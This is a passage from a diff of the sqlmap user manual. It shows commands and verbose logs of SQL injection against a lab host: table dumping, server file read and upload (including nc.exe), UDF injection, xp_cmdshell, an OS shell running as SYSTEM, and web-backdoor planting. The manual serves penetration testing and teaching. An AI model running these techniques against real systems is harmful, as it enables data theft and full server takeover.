-ORDER BY id ASC LIMIT 1, 1
-[hh:mm:09] [INFO] retrieved: fluffy
-[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
-test.users ORDER BY id ASC LIMIT 1, 1
-[hh:mm:09] [INFO] retrieved: bunny
-[hh:mm:09] [DEBUG] performed 41 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 2, 1
-[hh:mm:09] [INFO] retrieved: 3
-[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
-ORDER BY id ASC LIMIT 2, 1
-[hh:mm:09] [INFO] retrieved: wu
-[hh:mm:09] [DEBUG] performed 20 queries in 0 seconds
-[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
-test.users ORDER BY id ASC LIMIT 2, 1
-[hh:mm:09] [INFO] retrieved: ming
-[hh:mm:10] [DEBUG] performed 34 queries in 0 seconds
-SELECT * FROM test.users [3]:
-[*] 1, luther, blissett
-[*] 2, fluffy, bunny
-[*] 3, wu, ming
-</verb></tscreen>
-
-<p>
-As you can see from the example, if the <tt>SELECT</tt> statement has
-an asterisk instead of the column(s) name, sqlmap first retrieves all
-column names of the current table, asks if the query can return multiple
-entries and goes on.
-
-<p>
-Example of SQL statement other than <tt>SELECT</tt> on a <bf>PostgreSQL
-8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
-sql> SELECT COUNT(name) FROM users
-[hh:mm:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
-[hh:mm:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
-[hh:mm:59] [INFO] retrieved: 4
-SELECT COUNT(name) FROM users:    '4'
-
-sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
-[hh:mm:35] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:40] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users 
-(id, name, surname) VALUES (5, 'from', 'sql shell');'
-[hh:mm:40] [INFO] done
-sql> SELECT COUNT(name) FROM users
-[hh:mm:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
-[hh:mm:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
-[hh:mm:53] [INFO] retrieved: 5
-SELECT COUNT(name) FROM users:    '5'
-</verb></tscreen>
-
-<p>
-As you can see from the example, when the user provides a SQL statement 
-other than <tt>SELECT</tt>, sqlmap recognizes it, tests if the web 
-application supports stacked queries and in case it does, it executes
-the provided SQL statement in a multiple statement mode.
-
-<p>
-Beware that some web application technologies do not support stacked
-queries on specific database management systems. For instance, PHP does
-not support stacked queries when the back-end DBMS is MySQL, but it does
-support when the back-end DBMS is PostgreSQL.
+TODO
 
 
 <sect1>User-defined function injection
 
+<p>
+These options can be used to create custom user-defined functions.
+
 <sect2>Inject custom user-defined functions (UDF)
 
 <p>
@@ -3862,7 +2254,12 @@ options, execute them. When you are finished using the injected UDFs,
 sqlmap can also remove them from the database for you.
 
 <p>
-Example on a <bf>PostgreSQL 8.4</bf>:
+These techniques are detailed in the white paper
+<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
+name="Advanced SQL injection to operating system full control">.
+
+<p>
+Example against a PostgreSQL target:
 
 <tscreen><verb>
 $ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
@@ -3887,7 +2284,7 @@ do you want to retrieve the return value of the UDF? [Y/n]
 return value:    'test'
 
 do you want to call this or another injected UDF? [Y/n] n
-do you want to remove UDF 'sys_eval'? [Y/n] 
+do you want to remove UDF 'sys_eval'? [Y/n] y
 [12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only 
 be deleted manually
 </verb></tscreen>
@@ -3896,12 +2293,17 @@ be deleted manually
 If you want, you can specify the shared library local file system path
 via command line using <tt>-</tt><tt>-shared-lib</tt> option.
 
+<p>
+This feature is available only when the database management system is
+MySQL or PostgreSQL.
+
+
 <sect1>File system access
 
 <sect2>Read a file from the database server's file system
 
 <p>
-Switch: <tt>-</tt><tt>-read-file</tt>
+Switch: <tt>-</tt><tt>-file-read</tt>
 
 <p>
 It is possible to retrieve the content of files from the underlying file
@@ -3909,82 +2311,21 @@ system when the back-end database management system is either MySQL,
 PostgreSQL or Microsoft SQL Server, and the session user has the needed
 privileges to abuse database specific functionalities and architectural
 weaknesses.
-The file specified can be either a text or a binary file. sqlmap will
-handle it automatically.
+The file specified can be either a textual or a binary file. sqlmap will
+handle it properly.
 
 <p>
 These techniques are detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
+<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
 name="Advanced SQL injection to operating system full control">.
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target to retrieve a text file:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.aspx?id=1" \
-  --read-file "C:\example.txt" -v 2
-
-[...]
-[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: PostgreSQL
-
-[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)), 
-CHR(32))
-[hh:mm:53] [INFO] retrieved: 8.3.5,
-[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
-[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
-[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
-[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
-[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data 
-LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
-CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
-[hh:mm:03] [INFO] retrieved: 1
-[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
-[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:03] [DEBUG] cleaning up the database management system
-[hh:mm:03] [DEBUG] removing support tables
-[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
-[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file 
-is binary, its content will not be retrieved
-[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
-[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
-[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
-[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
-[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM 
-sqlmapfile
-[hh:mm:04] [INFO] retrieved: 1
-[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
-||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
-[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
-[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
-[hh:mm:22] [DEBUG] cleaning up the database management system
-[hh:mm:22] [DEBUG] removing support tables
-[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
-C:/example.txt file saved to:    '/home/inquis/sqlmap/output/192.168.136.131/files/C__example.txt'
-
-[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.136.131'
-
-$ cat output/192.168.136.131/files/C__example.txt 
-This is a text file
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target to
-retrieve a binary file:
+Example against a Microsoft SQL Server 2005 target to retrieve a binary
+file:
 
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --read-file "C:\example.exe" --union-use -v 1
+  --file-read "C:/example.exe" -v 1
 
 [...]
 [hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
@@ -3992,57 +2333,40 @@ web server operating system: Windows 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 
-[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
-technique
-[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name'
-[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter 
-'name' by appending a false condition after the parameter value
-[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
-inband sql injection vulnerability
-valid union:    'http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
-ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
-
-[hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:54] [INFO] fetching file: 'C:/example.exe'
-[hh:mm:54] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to:    '/home/inquis/sqlmap/output/192.168.136.131/files/
-C__example.exe'
-
-[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
-192.168.136.131'
+[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
+[hh:mm:50] [INFO] the SQL query provided returns 3 entries
+C:/example.exe file saved to:    '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
+[...]
 
 $ ls -l output/192.168.136.131/files/C__example.exe 
--rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
+-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
 
 $ file output/192.168.136.131/files/C__example.exe 
-output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
+80386 32-bit
 </verb></tscreen>
 
 
-<sect2>Write a local file on the database server's file system
+<sect2>Upload a file to the database server's file system
 
 <p>
-Switches: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt>
+Switches: <tt>-</tt><tt>-file-write</tt> and <tt>-</tt><tt>-file-dest</tt>
 
 <p>
-It is possible to upload a local file to the database server file system
+It is possible to upload a local file to the database server's file system
 when the back-end database management system is either MySQL, PostgreSQL
 or Microsoft SQL Server, and the session user has the needed privileges to
 abuse database specific functionalities and architectural weaknesses.
-The file specified can be either a text or a binary file. sqlmap will
-handle it automatically.
+The file specified can be either a textual or a binary file. sqlmap will
+handle it properly.
 
 <p>
 These techniques are detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
+<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
 name="Advanced SQL injection to operating system full control">.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target to upload a binary UPX-compressed
-file:
+Example against a MySQL target to upload a binary UPX-compressed file:
 
 <tscreen><verb>
 $ file /tmp/nc.exe.packed 
@@ -4051,8 +2375,8 @@ $ file /tmp/nc.exe.packed
 $ ls -l /tmp/nc.exe.packed
 -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
 
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --write-file \
-  "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
+  "/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
 
 [...]
 [hh:mm:29] [INFO] the back-end DBMS is MySQL
@@ -4060,13 +2384,7 @@ web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:29] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:29] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:29] [INFO] retrieved: 5.0.67
-[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:36] [INFO] retrieved: C
-[hh:mm:36] [INFO] the back-end DBMS operating system is Windows
+[...]
 do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
 written on the back-end DBMS file system? [Y/n] y
 [hh:mm:52] [INFO] retrieved: 31744
@@ -4074,508 +2392,165 @@ written on the back-end DBMS file system? [Y/n] y
 same size as the local file '/tmp/nc.exe.packed'
 </verb></tscreen>
 
-<p>
-Example on a <bf>PostgreSQL 8.4</bf> target to upload a text file:
 
-<tscreen><verb>
-$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 \
-  --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1
+<sect1>Operating system takeover
 
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: PostgreSQL
-
-[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:01] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:01] [INFO] retrieved: 8.4.2
-[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:07] [INFO] retrieved: 0
-[hh:mm:07] [INFO] retrieved: 0
-[hh:mm:07] [INFO] the back-end DBMS operating system is Linux
-do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully 
-written on the back-end DBMS file system? [Y/n] 
-[hh:mm:14] [INFO] retrieved: 2264
-[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, 
-same size as the local file '/etc/passwd'
-</verb></tscreen>
-
-
-<sect1>Operating system access
-
-<sect2>Execute arbitrary operating system command
+<sect2>Run arbitrary operating system command
 
 <p>
 Switches: <tt>-</tt><tt>-os-cmd</tt> and <tt>-</tt><tt>-os-shell</tt>
 
 <p>
-It is possible to execute arbitrary commands on the underlying operating
-system when the back-end database management system is either MySQL,
-PostgreSQL or Microsoft SQL Server, and the session user has the needed
-privileges to abuse database specific functionalities and architectural
-weaknesses.
+It is possible to <bf>run arbitrary commands on the database server's
+underlying operating system</bf> when the back-end database management
+system is either MySQL, PostgreSQL or Microsoft SQL Server, and the
+session user has the needed privileges to abuse database specific
+functionalities and architectural weaknesses.
 
 <p>
 On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality
 explained above) a shared library (binary file) containing two
 user-defined functions, <tt>sys_exec()</tt> and <tt>sys_eval()</tt>, then
-it creates these two functions on the database and call one of them to
-execute the specified command, depending on the user's choice to display
-the standard output or not.
-On Microsoft SQL Server, sqlmap abuses the <tt>xp_cmshell</tt> stored
-procedure: if it's disabled, sqlmap re-enables it; if it does not exist,
-sqlmap creates it from scratch.
+it creates these two functions on the database and calls one of them to
+execute the specified command, depending on user's choice to display the
+standard output or not.
+On Microsoft SQL Server, sqlmap abuses the <tt>xp_cmdshell</tt> stored
+procedure: if it is disabled (by default on Microsoft SQL Server >= 2005),
+sqlmap re-enables it; if it does not exist, sqlmap creates it from
+scratch.
 
 <p>
-If the user wants to retrieve the command standard output, sqlmap will use
-one of the enumeration SQL injection techniques (blind or inband) to
-retrieve it or, in case of stacked query SQL injection technique,
-sqlmap will execute the command without returning anything to the user.
+When the user requests the standard output, sqlmap uses one of the
+enumeration SQL injection techniques (blind, inband or error-based) to
+retrieve it. Vice versa, if the standard output is not required, stacked
+query SQL injection technique is used to execute the command.
 
 <p>
 These techniques are detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
+<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
 name="Advanced SQL injection to operating system full control">.
 
 <p>
-It is possible to specify a single command to be executed with the
-<tt>-</tt><tt>-os-cmd</tt> option.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
+Example against a PostgreSQL target:
 
 <tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.aspx?id=1" \
-  --os-cmd "whoami" -v 1
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
+  --os-cmd id -v 1
 
 [...]
-[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: PostgreSQL
+[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
+[hh:mm:12] [INFO] testing if current user is DBA
+[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
+[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
+[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
 
-[hh:mm:05] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:05] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:05] [INFO] retrieved: 8.3.5,
-[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:15] [INFO] retrieved: 1
-[hh:mm:16] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:16] [INFO] testing if current user is DBA
-[hh:mm:16] [INFO] retrieved: 1
-[hh:mm:16] [INFO] checking if sys_exec UDF already exist
-[hh:mm:16] [INFO] retrieved: 0
-[hh:mm:18] [INFO] checking if sys_eval UDF already exist
-[hh:mm:18] [INFO] retrieved: 0
-[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file
-[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:35] [INFO] retrieved: w2k3dev\postgres
-command standard output:    'w2k3dev\postgres'
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --os-cmd "whoami" --union-use -v 1
-
-[...]
-[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
-technique
-[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name'
-[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' 
-by appending a false condition after the parameter value
-[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
-sql injection vulnerability
-valid union:    'http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
-ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
-
-[hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:03] [INFO] testing if current user is DBA
-[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:09] [INFO] xp_cmdshell extended procedure is available
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:11] [INFO] the SQL query provided returns 1 entries
-command standard output:
----
-nt authority\network service
----
+[hh:mm:19] [INFO] cleaning up the database management system
+do you want to remove UDF 'sys_eval'? [Y/n] y
+do you want to remove UDF 'sys_exec'? [Y/n] y
+[hh:mm:23] [INFO] database management system cleanup finished
+[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can 
+only be deleted manually
 </verb></tscreen>
 
 <p>
 It is also possible to simulate a real shell where you can type as many
 arbitrary commands as you wish. The option is <tt>-</tt><tt>-os-shell</tt> and has
-the same TAB completion and history functionalities like
-<tt>-</tt><tt>-sql-shell</tt>.
+the same TAB completion and history functionalities that
+<tt>-</tt><tt>-sql-shell</tt> has.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
+Where stacked queries has not been identified on the web application
+(e.g. PHP or ASP with back-end database management system being MySQL) and
+the DBMS is MySQL, it is still possible to abuse the <tt>SELECT</tt>
+clause's <tt>INTO OUTFILE</tt> to create a web backdoor in a writable
+folder within the web server document root and still get command
+execution assuming the back-end DBMS and the web server are hosted on the
+same server.
+sqlmap supports this technique and allows the user to provide a
+comma-separated list of possible document root sub-folders where try to
+upload the web file stager and the subsequent web backdoor. Also, sqlmap
+has its own tested web file stagers and backdoors for the following
+languages:
 
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" \
-  --os-shell -v 2
+<itemize>
+<item>ASP
+<item>ASP.NET
+<item>JSP
+<item>PHP
+</itemize>
 
-[...]
-[hh:mm:36] [INFO] the back-end DBMS is MySQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:36] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:36] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32))
-[hh:mm:36] [INFO] retrieved: 5.0.67
-[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds
-[hh:mm:37] [DEBUG] query: SELECT SLEEP(5)
-[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
-[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
-[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32))
-[hh:mm:42] [INFO] retrieved: C
-[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds
-[hh:mm:42] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:42] [DEBUG] cleaning up the database management system
-[hh:mm:42] [DEBUG] removing support tables
-[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:42] [INFO] testing if current user is DBA
-[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=
-(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END)
-[hh:mm:42] [INFO] retrieved: 1
-[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds
-[hh:mm:43] [INFO] checking if sys_exec UDF already exist
-[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
-CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) 
-THEN 1 ELSE 0 END)
-[hh:mm:43] [INFO] retrieved: 0
-[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
-[hh:mm:43] [INFO] checking if sys_eval UDF already exist
-[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
-CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) 
-THEN 1 ELSE 0 END)
-[hh:mm:43] [INFO] retrieved: 0
-[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
-[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique
-[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to
-[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob)
-[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value
-[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the 
-support table
-[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table
-[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
-[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...])
-[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...])
-[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll'
-[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll'
-[hh:mm:44] [DEBUG] cleaning up the database management system
-[hh:mm:44] [DEBUG] removing support tables
-[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file
-[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec
-[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll'
-[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file
-[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval
-[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME 
-'libsqlmapudftxxgk.dll'
-[hh:mm:44] [DEBUG] creating a support table to write commands standard output to
-[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput
-[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
-[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
-operating system command execution
-[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
-os-shell> whoami
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami'))
-[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM 
-sqlmapoutput
-[hh:mm:41] [INFO] retrieved: nt authority\system
-[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds
-[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput
